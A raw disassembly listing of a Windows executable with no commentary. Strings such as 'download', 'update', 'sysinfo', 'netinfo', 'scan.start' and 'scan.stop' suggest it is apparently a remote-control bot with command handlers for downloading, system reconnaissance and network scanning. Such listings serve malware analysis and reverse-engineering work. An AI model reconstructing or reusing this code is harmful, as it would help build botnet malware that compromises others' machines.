lea eax, [esp+28Dh]
push ebx
push eax
mov [esp+294h], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+624h]
push eax
call ds:dword_41D0F4
push 80h
lea esi, [esp+28Ch]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
mov eax, esi
push eax
lea eax, [esp+624h]
push eax
push offset aSS_5 ; "%s\\%s"
lea eax, [esp+314h]
push edi
push eax
call sub_402AEE
lea eax, [esp+31Ch]
add esp, 14h
lea ecx, [eax+1]
loc_41BD11: ; CODE XREF: seg000:0041BD16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BD11
sub eax, ecx
xor ebx, ebx
mov [esp+eax+308h], bl
mov esi, 104h
push esi
lea eax, [esp+414h]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [esp+248h]
lea ecx, [eax+1]
loc_41BD49: ; CODE XREF: seg000:0041BD4E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41BD49
sub eax, ecx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push ebx
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call ds:dword_41D080
test eax, eax
jz loc_41BC10
lea eax, [esp+410h]
push eax
lea eax, [esp+24Ch]
push eax
lea eax, [esp+310h]
push eax
push offset aSSS_0 ; "%s %s%s"
call sub_419219
add esp, 10h
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41BDD1: ; CODE XREF: seg000:0041BD69�j
; seg000:0041BD86�j
lea eax, [esp+248h]
lea edx, [eax+1]
loc_41BDDB: ; CODE XREF: seg000:0041BDE0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BDDB
sub eax, edx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz loc_41BE8C
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_41BE8C
push edi
lea eax, [esp+51Dh]
push ebx
push eax
mov [esp+524h], bl
call sub_407B70
lea eax, [esp+254h]
add esp, 0Ch
lea edi, [eax+1]
loc_41BE41: ; CODE XREF: seg000:0041BE46�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE41
mov ecx, [esp+10h]
sub eax, edi
add eax, ecx
push eax
push offset aS_11 ; "%s"
lea eax, [esp+520h]
push esi
push eax
call sub_402AEE
add esp, 10h
xor esi, esi
loc_41BE69: ; CODE XREF: seg000:0041BE8A�j
lea eax, [esp+518h]
push eax
call ds:dword_41D0D0
test eax, eax
jnz short loc_41BE8C
push 0C8h
call ds:dword_41D0FC
inc esi
cmp esi, 3
jb short loc_41BE69
loc_41BE8C: ; CODE XREF: seg000:0041BDFB�j
; seg000:0041BE1C�j ...
push 80h
lea eax, [esp+28Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 37h
lea eax, [esp+255h]
push ebx
push eax
mov [esp+25Ch], bl
call sub_407B70
add esp, 0Ch
push 38h
lea esi, [esp+254h]
mov ebx, offset byte_4250E1
call sub_4196D1
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:dword_41D084
push 38h
mov esi, eax
lea eax, [esp+254h]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 1388h
push esi
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41BF0D
push ebx
call ds:dword_41D050
loc_41BF0D: ; CODE XREF: seg000:0041BF04�j
call sub_416F86
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF31
push offset sub_417119
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_4140AB
loc_41BF31: ; CODE XREF: seg000:0041BF1C�j
lea eax, [esp+20h]
push eax
mov dword ptr [esp+24h], 94h
call ds:dword_41D068
cmp dword ptr [esp+24h], 4
jz short loc_41BF6A
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF6A
push offset sub_419EA0
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_4140AB
loc_41BF6A: ; CODE XREF: seg000:0041BF49�j
; seg000:0041BF55�j
push 8
mov ds:byte_4269C0, bl
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF8F
push offset sub_418301
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_4140AB
loc_41BF8F: ; CODE XREF: seg000:0041BF7A�j
lea eax, [esp+0B8h]
push eax
push 202h
call ds:dword_41D274
test eax, eax
jnz loc_41C056
call sub_4192FB
mov ds:byte_433945, bl
call sub_41B775
mov eax, [ebp+8]
mov ds:byte_4268B4, bl
mov ds:dword_4266A4, eax
call sub_418D17
mov eax, ds:dword_433C40
mov eax, [eax]
mov ebx, offset dword_433C3C
mov [esp+14h], eax
mov [esp+10h], ebx
loc_41BFE1: ; CODE XREF: seg000:0041C00C�j
cmp dword ptr [esp+10h], 0
mov esi, ds:dword_433C40
jz short loc_41BFF4
cmp [esp+10h], ebx
jz short loc_41BFF9
loc_41BFF4: ; CODE XREF: seg000:0041BFEC�j
call sub_402F5D
loc_41BFF9: ; CODE XREF: seg000:0041BFF2�j
cmp [esp+14h], esi
jz short loc_41C00E
lea edi, [esp+18h]
lea esi, [esp+10h]
call sub_40168C
jmp short loc_41BFE1
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: seg000:0041BFFD�j
mov esi, offset dword_4269BC
loc_41C013: ; CODE XREF: seg000:0041C054�j
movsx eax, ds:word_424E48
push eax
push offset dword_424C48
mov edx, offset dword_424A48
mov ecx, esi
call sub_41802F
test al, al
jz short loc_41C042
mov ds:byte_4269C0, 1
loc_41C037: ; CODE XREF: seg000:0041C040�j
mov ecx, esi
call sub_417F01
test al, al
jnz short loc_41C037
loc_41C042: ; CODE XREF: seg000:0041C02E�j
push 3A98h
mov ds:byte_4269C0, 0
call ds:dword_41D0FC
jmp short loc_41C013
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: seg000:0041BFA4�j
call ds:dword_41D244
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41C061: ; CODE XREF: seg000:0041BC30�j
; seg000:0041BC3E�j
push offset byte_41EF17
call sub_419477
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41C070 proc near ; CODE XREF: sub_418DA0+2F�p
; sub_418DA0+6C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41C091
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41C091: ; CODE XREF: sub_41C070+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41C0AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41C0AD: ; CODE XREF: sub_41C070+27�j
or eax, eax
jnz short loc_41C0C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41C10A
; ---------------------------------------------------------------------------
loc_41C0C9: ; CODE XREF: sub_41C070+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41C0D7: ; CODE XREF: sub_41C070+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41C0D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41C105
cmp edx, [esp+0Ch+arg_4]
ja short loc_41C105
jb short loc_41C106
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41C106
loc_41C105: ; CODE XREF: sub_41C070+85�j
; sub_41C070+8B�j
dec esi
loc_41C106: ; CODE XREF: sub_41C070+8D�j
; sub_41C070+93�j
xor edx, edx
mov eax, esi
loc_41C10A: ; CODE XREF: sub_41C070+57�j
dec edi
jnz short loc_41C114
neg edx
neg eax
sbb edx, 0
loc_41C114: ; CODE XREF: sub_41C070+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41C070 endp
; ---------------------------------------------------------------------------
align 10h
cmp ds:dword_433C7C, 0
jz short sub_41C156
loc_41C129: ; CODE XREF: seg000:0041C154�j
push ebp
mov ebp, esp
sub esp, 8
and esp, 0FFFFFFF8h
fstp qword ptr [esp]
cvttsd2si eax, qword ptr [esp]
leave
retn
; ---------------------------------------------------------------------------
cmp ds:dword_433C7C, 0
jz short sub_41C156
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short loc_41C129
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C156 proc near ; CODE XREF: sub_41A9DE+5AB�p
; seg000:0041C127�j ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41C1B5
loc_41C179: ; CODE XREF: sub_41C156+69�j
fsubp st(1), st
test edx, edx
jns short loc_41C19D
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C19D: ; CODE XREF: sub_41C156+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C1B5: ; CODE XREF: sub_41C156+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41C179
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41C1C9: ; CODE XREF: sub_41C156+45�j
; sub_41C156+5D�j
leave
retn
sub_41C156 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_4212B8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C1EE: ; DATA XREF: sub_40B4B4+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421658
jmp loc_40428E
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AB8
jmp loc_40428E
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_402CCA
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AE8
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B18
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C274: ; DATA XREF: sub_41B775+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A00
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C299: ; DATA XREF: sub_418D17+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A2C
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B48
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B78
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BA8
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BD8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C370: ; DATA XREF: seg001:0041D28C�o
call sub_401291
and ds:dword_433C44, 0
push offset loc_41C498
mov ds:dword_433C40, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C38D: ; DATA XREF: seg001:0041D290�o
call sub_40172D
and ds:dword_433C50, 0
push offset loc_41C4E1
mov ds:dword_433C4C, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C3AA: ; DATA XREF: seg001:0041D294�o
push esi
push offset aDownload ; "download"
mov esi, offset dword_433C58
call sub_41BB84
mov ds:dword_433C58, offset off_420AE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3C6: ; DATA XREF: seg001:0041D298�o
push esi
push offset aUpdate ; "update"
mov esi, offset dword_433C54
call sub_41BB84
mov ds:dword_433C54, offset off_420AEC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3E2: ; DATA XREF: seg001:0041D29C�o
push esi
push offset aHttp ; "http"
mov esi, offset dword_433C5C
call sub_41BB84
mov ds:dword_433C5C, offset off_420B04
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3FE: ; DATA XREF: seg001:0041D2A0�o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset dword_433C60
call sub_41BB84
mov ds:dword_433C60, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C41A: ; DATA XREF: seg001:0041D2A4�o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset dword_433C64
call sub_41BB84
mov ds:dword_433C64, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: seg001:0041D2A8�o
mov eax, ds:dword_424644
add eax, 6
mov ds:dword_433C68, eax
retn
; ---------------------------------------------------------------------------
loc_41C444: ; DATA XREF: seg001:0041D2AC�o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset dword_433C74
call sub_41BB84
mov ds:dword_433C74, offset off_420D1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C460: ; DATA XREF: seg001:0041D2B0�o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset dword_433C6C
call sub_41BB84
mov ds:dword_433C6C, offset off_420D24
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C47C: ; DATA XREF: seg001:0041D2B4�o
push esi
push offset dword_41EEF0
mov esi, offset dword_433C70
call sub_41BB84
mov ds:dword_433C70, offset off_420D2C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C498: ; DATA XREF: seg000:0041C37C�o
mov eax, ds:dword_433C40
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C40
mov [eax+4], eax
and ds:dword_433C44, 0
cmp ecx, ds:dword_433C40
jz short loc_41C4CD
push esi
loc_41C4B9: ; CODE XREF: seg000:0041C4CA�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C40
pop ecx
mov ecx, esi
jnz short loc_41C4B9
pop esi
loc_41C4CD: ; CODE XREF: seg000:0041C4B6�j
push ds:dword_433C40
call sub_402F6D
and ds:dword_433C40, 0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C4E1: ; DATA XREF: seg000:0041C399�o
mov eax, ds:dword_433C4C
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C4C
mov [eax+4], eax
and ds:dword_433C50, 0
cmp ecx, ds:dword_433C4C
jz short loc_41C516
push esi
loc_41C502: ; CODE XREF: seg000:0041C513�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C4C
pop ecx
mov ecx, esi
jnz short loc_41C502
pop esi
loc_41C516: ; CODE XREF: seg000:0041C4FF�j
push ds:dword_433C4C
call sub_402F6D
and ds:dword_433C4C, 0
pop ecx
retn
; ---------------------------------------------------------------------------
mov ds:dword_425A84, offset off_41D314
mov ecx, offset dword_425A84
jmp sub_402CCA
; ---------------------------------------------------------------------------
align 1000h
seg000 ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 0001D000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg001 segment para public 'BSS' use32
assume cs:seg001
;org 41D000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_41D000 dd 381762h ; DATA XREF: sub_416F32+39�r
dword_41D004 dd 38179Bh ; DATA XREF: sub_416E5F+1D�r
; sub_416F32+1B�r
dword_41D008 dd 3817EBh ; DATA XREF: sub_416ECD+31�r
dword_41D00C dd 38183Fh ; DATA XREF: sub_416E5F+52�r
dword_41D010 dd 381872h ; DATA XREF: sub_416E5F+2A�r
; sub_416E5F+60�r ...
dword_41D014 dd 381894h ; DATA XREF: sub_419835+3C�r
dword_41D018 dd 3818E7h ; DATA XREF: sub_419C6D+A5�r
; sub_419C6D+1B6�r
dword_41D01C dd 38191Bh ; DATA XREF: sub_419760+82�r
dword_41D020 dd 38193Fh ; DATA XREF: sub_419A9F+132�r
dword_41D024 dd 381991h ; DATA XREF: sub_419C1D+C�r
dword_41D028 dd 3819B5h ; DATA XREF: sub_419760+24�r
dword_41D02C dd 3819E8h ; DATA XREF: sub_416ECD+14�r
; sub_419A9F+90�r ...
dword_41D030 dd 381A42h ; DATA XREF: sub_419EA0+299�r
dword_41D034 dd 381A67h ; DATA XREF: sub_419835+19�r
dword_41D038 dd 381ABEh ; DATA XREF: sub_419EA0+27D�r
dword_41D03C dd 381AF9h ; DATA XREF: sub_419C1D+2E�r
dword_41D040 dd 381B1Dh ; DATA XREF: sub_419C1D+3B�r
dword_41D044 dd 381B41h ; DATA XREF: sub_419C1D+1E�r
dd 381B65h, 0
dword_41D050 dd 380000h ; DATA XREF: sub_4078A7+E�r
; sub_419477+168�r ...
dword_41D054 dd 380045h ; DATA XREF: sub_4102B0+22�r
; sub_418E1F+29�r
dword_41D058 dd 380099h ; DATA XREF: sub_40B08A+5D�r
; sub_418DA0+B�r
dword_41D05C dd 3800E4h ; DATA XREF: sub_419219+8B�r
dword_41D060 dd 380162h ; DATA XREF: sub_409AB4+99�r
; sub_40AE54+2A�r ...
dword_41D064 dd 3801C6h ; DATA XREF: sub_418DA0+19�r
dword_41D068 dd 380230h ; DATA XREF: seg000:00403F86�r
; sub_418E51+24�r ...
dword_41D06C dd 380296h ; DATA XREF: sub_40E072+234�r
; sub_41142B+13�r ...
dword_41D070 dd 3802CCh ; DATA XREF: sub_418552+31E�r
dword_41D074 dd 38031Eh ; DATA XREF: sub_40CCBE+40�r
; sub_41075B+2D�r ...
dword_41D078 dd 38035Ch ; DATA XREF: sub_409DAD+17F�r
; sub_409DAD+2A3�r ...
dword_41D07C dd 380380h ; DATA XREF: sub_4140AB+5E�r
; sub_41A9DE+6CD�r ...
dword_41D080 dd 3803B2h ; DATA XREF: seg000:0041BD99�r
dword_41D084 dd 3803F8h ; DATA XREF: seg000:0041BED8�r
dword_41D088 dd 380440h ; DATA XREF: sub_409AB4+194�r
; sub_40CE5A+212�r ...
dword_41D08C dd 380464h ; DATA XREF: sub_41B3D0+20�r
; sub_41B5D2+43�r
dword_41D090 dd 380489h ; DATA XREF: sub_40468E+B9�r
; sub_419477+16F�r ...
dword_41D094 dd 3804AAh ; DATA XREF: sub_414023+8�r
dd 3804C8h
dword_41D09C dd 380530h ; DATA XREF: sub_41A9DE+63F�r
dword_41D0A0 dd 380579h ; DATA XREF: sub_409DAD+3E7�r
; sub_40BF57:loc_40C004�r ...
dword_41D0A4 dd 3805C8h ; DATA XREF: sub_41A5C1+2C3�r
dword_41D0A8 dd 3805F1h ; DATA XREF: sub_4105A7+14C�r
dword_41D0AC dd 380640h ; DATA XREF: sub_4104DC+45�r
dword_41D0B0 dd 380686h ; DATA XREF: sub_4104DC+78�r
dword_41D0B4 dd 38070Fh ; DATA XREF: sub_4104DC+9B�r
dword_41D0B8 dd 380748h ; DATA XREF: sub_40F04F+8C�r
dword_41D0BC dd 38079Ah ; DATA XREF: sub_40EC7F:loc_40ECD3�r
; sub_40ECFC:loc_40ED54�r
dword_41D0C0 dd 3807D1h ; DATA XREF: sub_4195EC+39�r
dword_41D0C4 dd 3807F6h ; DATA XREF: sub_4195EC+50�r
dword_41D0C8 dd 380864h ; DATA XREF: sub_4195EC+6F�r
dword_41D0CC dd 38089Ah ; DATA XREF: sub_40468E+F5�r
; sub_4195EC+13�r
dword_41D0D0 dd 3808B0h ; DATA XREF: sub_419E55+20�r
; seg000:0041BE71�r
dword_41D0D4 dd 3808CEh ; DATA XREF: sub_419948+3B�r
dword_41D0D8 dd 380906h ; DATA XREF: sub_4199AC+3B�r
dword_41D0DC dd 380942h ; DATA XREF: sub_408A4D+4B�r
; sub_40E072+29C�r ...
dword_41D0E0 dd 38097Ch ; DATA XREF: sub_40531A+60�r
; sub_4054D6+169�r ...
dword_41D0E4 dd 380994h ; DATA XREF: sub_405127+39�r
; sub_405193+39�r ...
dword_41D0E8 dd 3809BAh ; DATA XREF: sub_40F524+2D�r
; sub_419677+30�r ...
dword_41D0EC dd 3809E9h ; DATA XREF: sub_405127+49�r
; sub_405193+49�r ...
dword_41D0F0 dd 380A40h ; DATA XREF: sub_40531A+2�r
; sub_408A4D+55�r ...
dword_41D0F4 dd 380A60h ; DATA XREF: sub_416F86+D1�r
; sub_417119+A6�r ...
dword_41D0F8 dd 380AB6h ; DATA XREF: sub_40468E+FC�r
; sub_419E55+8�r
dword_41D0FC dd 380AD3h ; DATA XREF: sub_40773A+1D�r
; sub_40777A+25�r ...
dword_41D100 dd 380AFEh ; DATA XREF: seg000:00403F61�r
; sub_4105A7+67�r ...
dword_41D104 dd 380B2Dh ; DATA XREF: sub_419EA0:loc_41A108�r
dword_41D108 dd 380B40h ; DATA XREF: sub_40B08A+51�r
; sub_41748B+36�r ...
dword_41D10C dd 380B6Bh ; DATA XREF: seg000:00403F96�r
; seg000:00403FBF�r ...
dword_41D110 dd 380BA0h ; DATA XREF: sub_4140AB+1C�r
; sub_41B5D2+161�r
dword_41D114 dd 380BF6h ; DATA XREF: sub_4036E0+F�r
; seg000:00403F6A�r ...
dword_41D118 dd 380C1Dh ; DATA XREF: sub_40CE5A+11D�r
dword_41D11C dd 380C45h ; DATA XREF: sub_40CE5A:loc_40CF93�r
dword_41D120 dd 380CBDh ; DATA XREF: seg000:0040CB08�r
dword_41D124 dd 380CD3h ; DATA XREF: sub_40C33C+2D�r
; sub_40C33C+11C�r
dword_41D128 dd 380D1Eh ; DATA XREF: sub_40C33C+191�r
dword_41D12C dd 380D63h ; DATA XREF: sub_40BF57+30�r
; sub_40BF57+144�r ...
dword_41D130 dd 380DC4h ; DATA XREF: sub_40BF57+294�r
; sub_40BF57+365�r
dword_41D134 dd 380E24h ; DATA XREF: sub_40AF0D+B�r
dword_41D138 dd 380E59h ; DATA XREF: sub_40AF0D:loc_40AF87�r
; sub_40BF57+216�r ...
dword_41D13C dd 380E90h ; DATA XREF: sub_40AF0D+CC�r
dword_41D140 dd 380EADh ; DATA XREF: sub_40AF0D:loc_40AFEB�r
dword_41D144 dd 380F22h ; DATA XREF: sub_40AF0D+10F�r
; sub_40AF0D+126�r
dword_41D148 dd 380F64h ; DATA XREF: sub_4087E0+12B�r
; sub_4087E0+1C7�r ...
dword_41D14C dd 380FBCh ; DATA XREF: sub_4087E0+1B5�r
; sub_409AB4+169�r
dword_41D150 dd 380FFAh ; DATA XREF: sub_4087E0+21F�r
dword_41D154 dd 381014h ; DATA XREF: sub_405E64+27�r
; sub_40DA6D+134�r ...
dword_41D158 dd 381041h ; DATA XREF: sub_405E64+77�r
; sub_405F14+52�r
dword_41D15C dd 381091h ; DATA XREF: sub_405B50+22F�r
dword_41D160 dd 3810C5h ; DATA XREF: sub_405A83+11�r
dword_41D164 dd 381136h ; DATA XREF: sub_405A83+47�r
dword_41D168 dd 38116Bh ; DATA XREF: sub_4059F7+28�r
; sub_40815B+28�r ...
dword_41D16C dd 38119Ah ; DATA XREF: sub_40591F+D�r
; sub_4081AD+28�r ...
dword_41D170 dd 3811C4h ; DATA XREF: sub_4058CA+1�r
; sub_40DFD3+62�r
dword_41D174 dd 3811EEh ; DATA XREF: sub_40531A+78�r
; sub_40CB14+AB�r
dword_41D178 dd 38121Eh ; DATA XREF: sub_405229+2B�r
; sub_4054D6+85�r
dword_41D17C dd 38124Ch ; DATA XREF: sub_4051FF+23�r
; sub_4054D6+58�r
dword_41D180 dd 38128Dh ; DATA XREF: sub_4051F6�r
; sub_4054D6:loc_405575�r
dword_41D184 dd 3812B7h ; DATA XREF: sub_405127+7�r
; sub_405193+7�r ...
dword_41D188 dd 3812E1h ; DATA XREF: sub_404A44+27�r
dword_41D18C dd 3812F2h ; DATA XREF: sub_404A44+4A�r
dd 38130Ah
dword_41D194 dd 381337h ; DATA XREF: sub_40B08A+41�r
dword_41D198 dd 77EB9A84h ; DATA XREF: sub_40468E+D9�r
; sub_40AA15+14�r ...
dword_41D19C dd 381357h ; DATA XREF: sub_40468E+CE�r
; sub_40B18A+5�r ...
dword_41D1A0 dd 381383h ; DATA XREF: sub_40B08A+35�r
dword_41D1A4 dd 3813B5h ; DATA XREF: seg000:loc_404045�r
dword_41D1A8 dd 3813CEh ; DATA XREF: seg000:00403F4C�r
; sub_4087E0+15�r
dword_41D1AC dd 3813F1h ; DATA XREF: sub_4041BB+40�r
; sub_40F846+222�r
dword_41D1B0 dd 38146Dh ; DATA XREF: sub_413976�r
dword_41D1B4 dd 3814C0h ; DATA XREF: sub_404816+24�r
; sub_404ABE+56�r ...
dword_41D1B8 dd 3814ECh ; DATA XREF: sub_4049A0+84�r
; sub_404C69+95�r ...
dword_41D1BC dd 38151Ch ; DATA XREF: sub_4049A0+59�r
; sub_404C69+76�r ...
dd 0
dd 224C0h, 0
dd 8000000Bh, 8000001Fh, 80000018h, 80000029h, 8000004Bh
dd 0
dword_41D1E4 dd 22448h ; DATA XREF: sub_4190BD+148�r
; seg000:0041BB08�r
dd 0
dword_41D1EC dd 38154Bh ; DATA XREF: sub_41748B+30�r
dword_41D1F0 dd 381592h ; DATA XREF: sub_418C40+67�r
dword_41D1F4 dd 3815B4h ; DATA XREF: sub_418C40+C�r
dword_41D1F8 dd 3815DDh ; DATA XREF: sub_418C40+B1�r
dword_41D1FC dd 38160Ah ; DATA XREF: sub_418C40+94�r
dword_41D200 dd 38169Ah ; DATA XREF: sub_418AEB+D�r
dword_41D204 dd 3816BFh ; DATA XREF: sub_418C40+BB�r
dword_41D208 dd 3816EAh ; DATA XREF: sub_418C40+A5�r
dword_41D20C dd 381738h ; DATA XREF: sub_418C40+4A�r
dd 0
dword_41D214 dd 22490h ; DATA XREF: seg000:0041BA10�r
dword_41D218 dd 2247Ch ; DATA XREF: seg000:0041B9A2�r
dword_41D21C dd 224A4h ; DATA XREF: seg000:0041B95E�r
dd 0
dword_41D224 dd 80000003h ; DATA XREF: sub_41397C+98�r
; sub_417F01+117�r ...
dword_41D228 dd 80000013h ; DATA XREF: sub_4172CC+7D�r
; sub_417361+116�r ...
dword_41D22C dd 80000065h ; DATA XREF: sub_418B1F+FA�r
dword_41D230 dd 8000000Dh ; DATA XREF: sub_418B1F+10C�r
dword_41D234 dd 80000001h ; DATA XREF: sub_41835D+1A�r
dword_41D238 dd 80000006h ; DATA XREF: sub_418FC6+34�r
dword_41D23C dd 80000034h ; DATA XREF: sub_41802F+7B�r
dword_41D240 dd 80000004h ; DATA XREF: sub_41397C+78�r
